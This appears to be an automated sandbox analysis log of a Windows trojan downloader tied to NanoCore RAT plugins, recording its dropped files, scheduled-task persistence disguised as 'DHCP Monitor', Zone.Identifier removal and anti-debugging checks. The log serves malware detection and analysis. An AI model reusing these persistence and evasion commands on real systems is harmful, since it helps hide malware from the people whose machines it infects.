Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Metadefender: Detection: 21%
Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	ReversingLabs: Detection: 75%

Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	String found in binary or memory: </UserId><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals><Settings><MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy><AllowHardTerminate>false</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><IdleSettings><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority></Settings><Actions Context="Author"><Exec><Command>
Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	String found in binary or memory: </UserId><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals><Settings><MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy><AllowHardTerminate>false</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><IdleSettings><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority></Settings><Actions Context="Author"><Exec><Command>

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /Create /TN images /XML 'C:\Users\user\AppData\Local\Temp\27c398b5630447af830b2dd2bc343446.xml'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /TN images /XML 'C:\Users\user\AppData\Local\Temp\27c398b5630447af830b2dd2bc343446.xml'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp182E.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1B1D.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /Create /TN images /XML 'C:\Users\user\AppData\Local\Temp\27c398b5630447af830b2dd2bc343446.xml'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /TN images /XML 'C:\Users\user\AppData\Local\Temp\27c398b5630447af830b2dd2bc343446.xml'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp182E.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1B1D.tmp'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe, 00000000.00000003.216864769.0000000002810000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe, 00000000.00000003.216864769.0000000002810000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: MSBuild.exe, 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: MSBuild.exe, 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp
Source:	Binary string: f:\dd\vsproject\xmake\XMakeCommandLine\objr\i386\MSBuild.pdb source: dhcpmon.exe, dhcpmon.exe.3.dr
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: MSBuild.exe, 00000003.00000003.228783921.0000000004481000.00000004.00000001.sdmp

Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

0_2_00321090

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Code function: 0_2_00322979 push ecx; ret

0_2_0032298C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	File created: C:\Users\user\AppData\Local\Temp\Temp\images.exe			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /TN images /XML 'C:\Users\user\AppData\Local\Temp\27c398b5630447af830b2dd2bc343446.xml'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Window / User API: threadDelayed 661	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Window / User API: foregroundWindowGot 639	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Window / User API: foregroundWindowGot 609	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Temp\images.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 5912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 5712	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6076	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6044	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5932	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: MSBuild.exe, 00000003.00000003.310491763.0000000000DBE000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

Code function: 0_2_003212F4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_003212F4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe

0_2_00321090

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Code function: 0_2_00AB4C15 mov eax, dword ptr fs:[00000030h]	0_2_00AB4C15
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Code function: 0_2_00AB4C78 mov eax, dword ptr fs:[00000030h]	0_2_00AB4C78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Code function: 0_2_00AB13B8 mov eax, dword ptr fs:[00000030h]	0_2_00AB13B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader36.7233.23906.exe	Code function: 0_2_00AB4BD8 mov eax, dword ptr fs:[00000030h]	0_2_00AB4BD8

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Process token adjusted: Debug

Jump to behavior

